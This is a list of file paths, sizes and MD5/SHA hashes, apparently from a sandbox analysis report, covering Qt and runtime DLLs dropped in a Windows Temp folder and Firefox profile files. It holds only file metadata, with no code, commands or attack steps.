C:\Users\Admin\AppData\Local\Temp\{C1F30AD5-204F-4BEE-BC9B-DD775CD60E06}\CD60E06\LocalAppDataFolder\Corporation\imageformats\qjpeg.dll
Filesize245KB
MD53232706a63e7cdf217b8ed674179706c
SHA112ac2af70893147ca220d8e4689e33e87f41688d
SHA25645c1f50c922ac1d9d4108e37f49981fd94f997667e23085cb2ea226d406c5602
SHA512db787e96a2ad4d67338f254996cf14c441de54fc112065fba230da97593de6b1fb4ef0459dcd7f4aea8fb3648fa959c05978ca40813036bf8a26860befa38407
-
C:\Users\Admin\AppData\Local\Temp\{C1F30AD5-204F-4BEE-BC9B-DD775CD60E06}\CD60E06\LocalAppDataFolder\Corporation\imageformats\qsvg.dll
Filesize26KB
MD52831b334b8edf842ce273b3dd0ace1f8
SHA1e586bf0172c67e3e42876b9cd6e7f349c09c3435
SHA2566bae9af6a7790fbdee87b7efa53d31d8aff0ab49bdaaefd3fb87a8cc7d4e8a90
SHA51268dca40e3de5053511fc1772b7a4834538b612724ec2de7fb2e182ba18b9281b5f1ccf47bd58d691024f5bcddfc086e58570ad590dd447f6b0185a91a1ac2422
-
C:\Users\Admin\AppData\Local\Temp\{C1F30AD5-204F-4BEE-BC9B-DD775CD60E06}\CD60E06\LocalAppDataFolder\Corporation\imageformats\qtga.dll
Filesize25KB
MD5d0604a5f13b32a08d5fa5bd887f869a6
SHA1976338eb697507ac857a6434ef1086f34bc9db24
SHA2562b6444d2a8146a066109ca19618ceee98444127a5b422c14635ab837887e55bf
SHA512c42edbaf6506dc1ca3aae3f052a07c7d2c4841f5b83003186cda185193f7cd2035cfe07e04a28356d254ab54666b5d60be4763e3e204273ecd0d7f2cd84bfc90
-
C:\Users\Admin\AppData\Local\Temp\{C1F30AD5-204F-4BEE-BC9B-DD775CD60E06}\CD60E06\LocalAppDataFolder\Corporation\imageformats\qtiff.dll
Filesize314KB
MD5756d047a93d72771578286e621585ed2
SHA1313add1e91a21648f766aaa643350bec18ec5b5d
SHA256f9ebf4c98c1e0179cd76a1985386928fdb9e6f459e2238ed5530d160df4f0923
SHA51267fa91f266f0030ca0695f1c7964ee4d1c1447413420d0379eca62d54cc9d6cd0706df62da0043259b563e95a9c3a5c7ef0e0baacb36cafed5c9fcb1a3954aca
-
C:\Users\Admin\AppData\Local\Temp\{C1F30AD5-204F-4BEE-BC9B-DD775CD60E06}\CD60E06\LocalAppDataFolder\Corporation\imageformats\qwbmp.dll
Filesize25KB
MD5131a58669be7b3850c46d8e841da5d4e
SHA11c08ae3c9d1850da88edc671928aa8d7e2a78098
SHA256043f3acf1dc4f4780721df106046c597262d7344c4b4894e0be55858b9fad00e
SHA5124f62b0c5ba0be6fb85fa15e500c348c2a32266e9b487357ea8ed1c1be05d7eabc46c9a1eeb9c5339291f4dd636b7291447a84d4ad5efbc403e5e7966b3863ade
-
C:\Users\Admin\AppData\Local\Temp\{C1F30AD5-204F-4BEE-BC9B-DD775CD60E06}\CD60E06\LocalAppDataFolder\Corporation\imageformats\qwebp.dll
Filesize325KB
MD5f859ecc883476fe2c649cefbbd7e6f94
SHA19900468c306061409e9aa1953d7d6a0d05505de8
SHA256b057c49c23c6ebe92e377b573723d9b349a6ede50cfd3b86573b565bf4a2ae0b
SHA51267af11fb9c81a7e91be747b2d74e81e8fe653ef82f049b652c7892c4ec4cafeba76b54a976616cbf1cd6b83f0abe060e82e46bf37f3ed841d595c4318d6fd73b
-
C:\Users\Admin\AppData\Local\Temp\{C1F30AD5-204F-4BEE-BC9B-DD775CD60E06}\CD60E06\LocalAppDataFolder\Corporation\libEGL.dll
Filesize18KB
MD5379358b4cd4b60137c0807f327531987
SHA1b0a5f6e3dcd0dbc94726f16ed55d2461d1737b59
SHA2560ff1d03926f5d9c01d02fae5c5e1f018a87d7f90a1826de47277530bfc7776f8
SHA512097c08135d654596a19ada814ad360a8c2374d989cbd7094c6acb092e9854abf1f1d878d3da72b66c4c75806586bee7fe04d555a1d82db170725bdbeadea7d50
-
C:\Users\Admin\AppData\Local\Temp\{C1F30AD5-204F-4BEE-BC9B-DD775CD60E06}\CD60E06\LocalAppDataFolder\Corporation\libGLESV2.dll
Filesize1.5MB
MD5aebbd25609c3f1d16809c02f12e99896
SHA17675d0f61062490b8c7043a66a8d88d5d147f7a9
SHA2566765d163fae52331dfdcccab371c9b8b5cd0915bfdb14bbf2ca5d3f42bb29f4c
SHA512a441ae0fe98ae39ed7fd1feb410bcac3aba9179242c62166190926588b97e11f0a3442d0619c6a2f6070e336a82d7fcabeb89461ff15fe878da13f2a57710f87
-
C:\Users\Admin\AppData\Local\Temp\{C1F30AD5-204F-4BEE-BC9B-DD775CD60E06}\CD60E06\LocalAppDataFolder\Corporation\libeay32.dll
Filesize1.1MB
MD567130d64a3c2b4b792c4f5f955b37287
SHA16f6cae2a74f7e7b0f18b93367821f7b802b3e6cf
SHA2567581f48b16bd9c959491730e19687656f045afbab59222c0baba52b25d1055be
SHA512d88c26ec059ad324082c4f654786a3a45ecf9561a522c8ec80905548ad1693075f0ffc93079f0ef94614c95a3ac6bbf59c8516018c71b2e59ec1320ba2b99645
-
C:\Users\Admin\AppData\Local\Temp\{C1F30AD5-204F-4BEE-BC9B-DD775CD60E06}\CD60E06\LocalAppDataFolder\Corporation\msvcp120.dll
Filesize444KB
MD5fd5cabbe52272bd76007b68186ebaf00
SHA1efd1e306c1092c17f6944cc6bf9a1bfad4d14613
SHA25687c42ca155473e4e71857d03497c8cbc28fa8ff7f2c8d72e8a1f39b71078f608
SHA5121563c8257d85274267089cd4aeac0884a2a300ff17f84bdb64d567300543aa9cd57101d8408d0077b01a600ddf2e804f7890902c2590af103d2c53ff03d9e4a5
-
C:\Users\Admin\AppData\Local\Temp\{C1F30AD5-204F-4BEE-BC9B-DD775CD60E06}\CD60E06\LocalAppDataFolder\Corporation\msvcr120.dll
Filesize948KB
MD5034ccadc1c073e4216e9466b720f9849
SHA1f19e9d8317161edc7d3e963cc0fc46bd5e4a55a1
SHA25686e39b5995af0e042fcdaa85fe2aefd7c9ddc7ad65e6327bd5e7058bc3ab615f
SHA5125f11ef92d936669ee834a5cef5c7d0e7703bf05d03dc4f09b9dcfe048d7d5adfaab6a9c7f42e8080a5e9aad44a35f39f3940d5cca20623d9cafe373c635570f7
-
C:\Users\Admin\AppData\Local\Temp\{C1F30AD5-204F-4BEE-BC9B-DD775CD60E06}\CD60E06\LocalAppDataFolder\Corporation\opengl32sw.dll
Filesize14.5MB
MD53bd5aea364326cdfa667651a93e7a4c9
SHA1f33b4a83e038363c1a4df919e6f6e0e41dba9334
SHA25623f04ba936568e9a7c9dce7a6beb52c9be7eb13b734cd390c99e7546cbe1973d
SHA5127bd4e742b4d683b79de54eaf7d8b215252212921b8a53d1fbfc8e51ce43505c003da62fd126663bc04bbc65b8f77b85232c78ea6ecba8a4e425c28c0e9c80dc3
-
C:\Users\Admin\AppData\Local\Temp\{C1F30AD5-204F-4BEE-BC9B-DD775CD60E06}\CD60E06\LocalAppDataFolder\Corporation\platforms\qwindows.dll
Filesize1005KB
MD5be068132ece3f794f09c9d6b5ba20b91
SHA1859599fa72d128e33db6fe99ba95a8b63b15cc89
SHA25659dcecb111aa15159414819f4f522e7f90597939cab572b982beebee5dc0efdf
SHA51213829ae9b7bd0cba95800075b24570f3c70a6c4b3d4b3c4da76b0077e37c75194e929d8d56a2db69e22a319ba5077d188a6f3baedd1f69f79979717d6f6d1b6f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\AlternateServices.bin
Filesize10KB
MD56d9cb1266def4b1b64eb9b624b7d9e68
SHA1e68b7330343380a13b7e338e45c517f9b6e80c71
SHA2569ff40f3d0a59d2be4af44d7f13d86f8fc532319dbc08cd96e8d802ab11537031
SHA512a3276a572dace9588576616788105c2cc04654f1624835e77b0a2c83a1de2ba0f697f3830713d1ed6355f74baaefc4c468909d39433fb9aa31a77d2165ad9de2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\db\data.safe.tmp
Filesize24KB
MD5bcfc3afb394af7a32ea13eef6575d1be
SHA16f84dcd0ea03430f5db1d745ee6ab3cf4057ec83
SHA256cf9ca7c36992857e28a6289383aa05e018ef68ed1a6ed2e3d85acc7f9560cbe4
SHA512b25026f82f301ede1d3f618cec3057864071a8cdfaaf2d5dcd074738a5d90ca610a01bb9a656ec4a50fbeea14b1b89b888c40e1a8c759aca576c56304a61b15e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\db\data.safe.tmp
Filesize25KB
MD57ea93c17e0876567a3002f6cf99c109a
SHA1d8bdbe38bf4706ea2991f6322f7b8ae9bb55eda4
SHA256cff02c5e3489564f2ec1f3b46a6a335351ddd8c89f7e688cd91ec8cc7e5aa488
SHA512ed789b4b553e0ca0b878469ca1348ec323c1ad465775e2b319ddfcbb81b0c8b3043fdaeb662ab5a71c56b0d751c45179648ca4e195724721d4ecf900a3f38324
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\db\data.safe.tmp
Filesize22KB
MD5d2516cfa5886860a8f297768b7b77ae9
SHA1843d734c8a11e19630db2b87bc82f85ee2377c53
SHA25650175ef0b127d4414f190309522ae0e941152c26ed2f1199be31007030a24e67
SHA5122e3ca1f5c01ba82701c7f5f991a79033e0c347453f42a1416cc99d55d8f9fbd30906fa54d88c739f3127476804f722d1e5df54b063e81bb2905d79dcb7158fd8
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\db\data.safe.tmp
Filesize21KB
MD50f322b8a3abdd226bb7aebf45aa095d9
SHA1254dad9a6e0a9d5c9be708caf6fd7dcc9e39e773
SHA2569bff6bb4bbedfdd399baf2ef63d3e994852aef7d5476b66924d698b2e9f49e99
SHA5121bdbb0adfc7a8430f73bcfb81e90f2e6679021a3263fa826ed85f693501a04902139f866f42a5852c384f8ffd8d0218d9423c7e74f514e01a6d5b26419bdffaf
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\pending_pings\716175eb-c55d-410f-b2c6-059cfb44dca6
Filesize659B
MD5c1d74b08373511e0d787f73710c6b393
SHA17cbf079fa099c92e0d906fd2dc91401a8eb93de7
SHA256bc122c382a1432182bf803ad317353ca58b34466567ee8418c8e4c5c4e562410
SHA512f488f2ceb9005177e7848400ad6c5378259fe3fc7775b7e461fa985324520c56693705cb9ad29e146eece1c019539dd1969700e473fb8587baea668959017d0e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\pending_pings\8c01bd38-d054-46e4-b0db-5e5d1d8c679b
Filesize982B
MD55317ed28a0e06c850b68b18d56406308
SHA1b08acf00854ec8f7369fe7eb554bf014fd710923
SHA256808ff8ee9de8960cd19d9ce50457ecca6f88246107ff769b0e508a5230a9b708
SHA512e848cb876612ddf9088e47d767496cbb11fa6c7675f8cec718e3424df6b96e87b5fca5825341b93f7b9088a25478d9c9ebda1739076c045bf3ade98c11aa96cc
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
Filesize372B
MD5bf957ad58b55f64219ab3f793e374316
SHA1a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA51279c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
Filesize17.8MB
MD5daf7ef3acccab478aaa7d6dc1c60f865
SHA1f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA5125840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize
15KB
MD5839e9b50b027559954710ed273c17381
SHA199f26ee53f73b5f96af3c62e4ff572d441a7924d
SHA256804c917b5dcb545396c09926def148137da938ada6057245c7fe4767a7cd2397
SHA512f7336cc62a4867f1f43a1952e217ac73118f6dddd19439dd8fcefb8cba9a68de6d4ac482b163bcaa8869cb541eecf4de541008b7bdf1220f599feb682170852c
-
Filesize
10KB
MD54e4a3c7104fa111ab2c43d341bd3473a
SHA19895c0897d95e24e39ab8d8eaca61aad022240c0
SHA2562a37c0ce8a3e22dbca41abaa0ac101a54d7724745a657b02891e8914075b6c85
SHA512c6a168c50f91de261adc0e3d5e54e4116de4d1bfe45dbe09bd57276f345010c701f61d51c7c13643600f2aa7117ac7c7186c34ef9ffd49f68647098437620997
-
Filesize
11KB
MD5c8868b2671d1ca75df00d2d1ea255d64
SHA141a6600ebbe6ad77ef296748dd99a4d6e52dc171
SHA256a05a4c640ad1610428b8fd6a98ed548806d4d87019537e0a869d11ce33151b0c
SHA512c864be39659d5dea821b365a949331cb20917e5da4a2371a19d2d434f9b1e92bd64962fc7f81fdaea56e3466c1c35700731bc4818ddf221a9533042626894707
-
Filesize
10KB
MD5b6a4465aace0e90140d406b6d664fb00
SHA13f2fd4684d2529c0d9744eddee6c0178c81ca7f0
SHA2560f4567a6fb07060feb14111e0d441b16482da78ffab12ef5e03799cbee315bd4
SHA512dca90e71bb32b10336cb0b34f314f0d8c68ebfc2cf14b86a8401fff9146b50057a393c23aed0139b3efe912fa732e429db418601f0d0fc3132aa21b1e53c684a
-
Filesize
703KB
MD593a39fec52c5a31eebddb1fefaf70377
SHA1ea09fb38f4468883ce54619b2196f9531909523f
SHA25641f0a1e447cd4a83ebb301907d8d5a37cb52235c126f55bd0bd04327b77136bc
SHA5121439d6333872963aa14c8199fdd864a36f7e7d8cc603c4013ed39333dee3d8ea937f11aadf19a6737f5884e2269ff7ca13fedbd5cad8838719838e9d44a156b3
-
Filesize
414KB
MD530959eddf9fbd69c18b43035e3f28be0
SHA16d4973ed29f13535b7b7b04bdc90724212f7b54a
SHA2569ddcdf44f1ec97074da94803acec5531114d21ee748e99375a0008d966518914
SHA512b4e3ec1ba4dc97227efd8de2dc7dcc026bd2881addb3319d9f34556c4a7e154b521ecb689862f9b44e59a351775e7af519c11524f381e5a4293f0f289c3057f8